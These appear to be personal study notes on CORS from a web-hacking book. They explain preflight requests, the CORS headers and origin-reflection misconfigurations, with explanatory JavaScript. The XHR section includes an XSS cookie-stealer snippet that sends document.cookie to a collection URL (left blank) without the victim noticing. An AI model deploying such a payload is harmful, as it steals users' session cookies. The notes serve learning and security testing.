Notes from "Hacking Web Apps" Book CORS chapter.


This is just my understanding of what I read throughout the book. It may not be perfect information, and I advise you to do your own research on anything that is not properly understood or seems "off".

Preflight requests

A preflight request is a small OPTIONS request that the browser sends on its own before the actual cross-origin request, whenever that request is not "simple" (for example a PUT or DELETE, or a POST with a JSON Content-Type or a custom header). It tells the server which HTTP method the real request will use and which non-standard headers it will carry, and the real request is only sent if the server's answer permits them. This is most commonly seen with the XHR object (fetch behaves the same way).
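As an added example (my own code, not from the book or the original notes), the following models the rule the browser applies to decide whether a preflight is needed, using the safelisted methods, headers and Content-Type values from the Fetch standard, and builds the OPTIONS request it would send. The function names and the origin https://app.example are made up for the example; it deliberately ignores the less common safelist limits such as header value length.

```javascript
// Added example: when does a cross-origin XHR/fetch request trigger a preflight?
// Not the book's code; names and origins are invented for illustration.

const SAFE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// Names of request headers that are not CORS-safelisted. Any of these forces a
// preflight, and they are the ones listed in Access-Control-Request-Headers.
function unsafeHeaderNames(headers) {
  const unsafe = [];
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFE_HEADERS.has(lower)) {
      unsafe.push(lower);
    } else if (lower === "content-type") {
      // Only the media type counts; parameters such as charset are ignored.
      const mediaType = value.split(";")[0].trim().toLowerCase();
      if (!SAFE_CONTENT_TYPES.has(mediaType)) unsafe.push(lower);
    }
  }
  return unsafe.sort();
}

// A request is "simple" (no preflight) only if both the method and every
// header are safelisted. Note that a form-encoded POST needs no preflight,
// which is why CSRF is still possible against form-style endpoints.
function needsPreflight(method, headers) {
  return !SAFE_METHODS.has(method.toUpperCase()) || unsafeHeaderNames(headers).length > 0;
}

// The OPTIONS request the browser sends first, or null if none is needed.
// The Origin value comes from the browser, never from page script.
function buildPreflight(origin, method, headers) {
  if (!needsPreflight(method, headers)) return null;
  const req = {
    method: "OPTIONS",
    headers: {
      "Origin": origin,
      "Access-Control-Request-Method": method.toUpperCase(),
    },
  };
  const unsafe = unsafeHeaderNames(headers);
  if (unsafe.length > 0) {
    req.headers["Access-Control-Request-Headers"] = unsafe.join(", ");
  }
  return req;
}

// Constructed sample requests from a page at https://app.example
const samples = [
  ["POST", { "Content-Type": "application/x-www-form-urlencoded" }],
  ["POST", { "Content-Type": "application/json; charset=utf-8" }],
  ["DELETE", { "Authorization": "Bearer x", "Content-Type": "application/json" }],
];
for (const [method, headers] of samples) {
  const p = buildPreflight("https://app.example", method, headers);
  console.log(method, p ? JSON.stringify(p.headers) : "no preflight");
}
```

The third sample is the shape you will see in a proxy when testing an API: the OPTIONS request carries Access-Control-Request-Method: DELETE and Access-Control-Request-Headers: authorization, content-type, and the DELETE itself only follows if the server's Access-Control-Allow-Methods and Access-Control-Allow-Headers cover both.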

XHR Object

The XMLHttpRequest object lets page script make asynchronous background requests, including non-GET methods such as POST. That makes it handy for silent web hacking payloads, for example an XSS cookie stealer that exfiltrates document.cookie without the victim noticing (only cookies without the HttpOnly flag are readable from script this way).

var xhr = new XMLHttpRequest();
// the collection URL is left empty in the original notes; the victim's cookie is appended to it
var url_to_use = "" + document.cookie;
// asynchronous GET so the page carries on and the victim sees nothing
xhr.open('GET', url_to_use, true);
xhr.send();

CORS (Cross Origin Resource Sharing)

Web developers keep pushing the boundaries of what a browser allows, so that web apps can behave as much as possible like native applications.

One of those boundaries is the Same Origin Policy, which was also one of the few security mechanisms built into the first browsers. Developers often have legitimate reasons for wanting to relax it, for example when a site is spread across several domains, or when two unrelated domains need to exchange data from page script.

Browser request CORS headers (3)

Origin
    The scheme, host and port of the page that made the request (for example https://app.example). The server decides whether to grant sharing to this origin. The value is set by the browser itself and cannot be changed by the page's HTML, JavaScript or plugins, which is what lets the server base a decision on it for browser traffic. It is not proof of anything beyond the browser: a non-browser client such as curl can send any Origin it likes, so the header protects users from cross-site reads, it does not authenticate the caller.

Access-Control-Request-Method
    Sent in a preflight request to ask whether the server will accept the method the XHR wants to use for the real request.

Access-Control-Request-Headers
    Also sent in a preflight request, to ask whether the server will accept the additional (non-safelisted) headers the XHR wants to send.

Server response CORS headers (6)

Access-Control-Allow-Credentials
    Only the value "true" is recognised; anything else, or leaving the header out, means credentials are not allowed. By default the browser does not send credentials such as cookies, HTTP basic auth strings or client TLS certificates cross-origin, and will not expose a credentialed response to script unless this header is "true". Its purpose is to keep malicious pages from reading sensitive, authenticated responses.

Access-Control-Allow-Headers
    Lists the request headers a cross-origin client may use. Some headers such as Origin and Host are set by the browser and are never negotiated; in practice this header governs Content-Type and custom X- headers.

Access-Control-Allow-Methods
    Declares which methods the browser may use cross-origin. It should list only the request types that are strictly needed, which is often just GET.

Access-Control-Allow-Origin
    Declares which origin the server allows the browser to share its response with: a single explicit origin, the wildcard *, or the literal string "null". Omitting the header denies sharing. "null" is not a way to deny: it is the real origin value of sandboxed iframes, local files and data: URLs, so allowing it lets attacker-controlled content through and is a known misconfiguration. The wildcard never combines with credentials: if the response says * the browser withholds cookies and other authentication material regardless of Access-Control-Allow-Credentials.

Access-Control-Expose-Headers
    Lists the response headers the browser makes visible to page script, for example headers that JavaScript may read off a completed XHR. Without it only a handful of simple response headers are readable.

Access-Control-Max-Age
    How long, in seconds, the browser may cache the answer to a preflight request. Longer values extend the window during which an overly permissive preflight answer keeps being honoured.


Sharing resources cross-origin must be allowed by the server: access to its responses stays restricted by the Same Origin Policy unless the response carries one or more CORS headers (the Access-Control-* headers above) that say otherwise. The browser, for its part, sends the Origin header and, when needed, the Access-Control-Request-* headers. For requests that are not simple the browser first sends a preflight to establish the CORS policy; this applies to XHR and fetch alike. One practical check when testing: a server that echoes any Origin back in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true has effectively switched off the Same Origin Policy for authenticated data, which is the classic CORS misconfiguration to look for.
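As an added example (my own code, not from the book or the original notes), the following puts the server-side decision and the browser-side check side by side: an origin-reflecting server that allows credentials, a hardened allowlist version, and a small model of the rule the browser applies before exposing a response to script, including the wildcard-plus-credentials and "null" origin cases from the table above. The hosts api.example, app.example and evil.example and all function names are invented for the example.

```javascript
// Added example: server CORS policy (weak and hardened) next to the browser's
// exposure check. Not the book's code; hosts and names are made up.

const ALLOWED_ORIGINS = new Set(["https://app.example", "https://admin.app.example"]);

// Insecure pattern: reflect whatever Origin arrives and allow credentials.
// Any site can then read the victim's authenticated responses from api.example.
function corsHeadersReflecting(origin) {
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened pattern: exact match against an allowlist. Anything else, including
// the literal "null" origin, gets no CORS headers at all, so the browser keeps
// the response behind the Same Origin Policy.
function corsHeadersAllowlisted(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Access-Control-Allow-Methods": "GET, POST",
    "Access-Control-Allow-Headers": "Content-Type",
    "Access-Control-Max-Age": "600",
    // Vary: Origin keeps a shared cache from serving one origin's
    // Access-Control-Allow-Origin value to a different origin.
    "Vary": "Origin",
  };
}

// Models the browser's check on the actual response: true when script running
// at `origin` is allowed to read the body.
function browserExposesResponse(origin, withCredentials, headers) {
  const acao = headers["Access-Control-Allow-Origin"];
  if (acao === undefined) return false;
  if (acao === "*") {
    // The wildcard never combines with credentials, whatever ACAC says.
    return !withCredentials;
  }
  if (acao !== origin) return false;
  if (withCredentials && headers["Access-Control-Allow-Credentials"] !== "true") return false;
  return true;
}

// Constructed scenarios: the victim is logged in to api.example, the attacker's
// page runs at https://evil.example and sets withCredentials = true.
const attacker = "https://evil.example";
console.log("reflecting server leaks to attacker:",
  browserExposesResponse(attacker, true, corsHeadersReflecting(attacker)));
console.log("allowlisted server leaks to attacker:",
  browserExposesResponse(attacker, true, corsHeadersAllowlisted(attacker)));
console.log("allowlisted server accepts a 'null' origin:",
  browserExposesResponse("null", true, corsHeadersAllowlisted("null")));
console.log("allowlisted server serves the real app:",
  browserExposesResponse("https://app.example", true, corsHeadersAllowlisted("https://app.example")));
console.log("wildcard with credentials:",
  browserExposesResponse(attacker, true,
    { "Access-Control-Allow-Origin": "*", "Access-Control-Allow-Credentials": "true" }));
```

Only the reflecting server lets the attacker read the authenticated response; the allowlist rejects both evil.example and "null", and the wildcard case shows that setting Access-Control-Allow-Credentials: true next to * buys the server nothing, because the browser refuses that combination on its own.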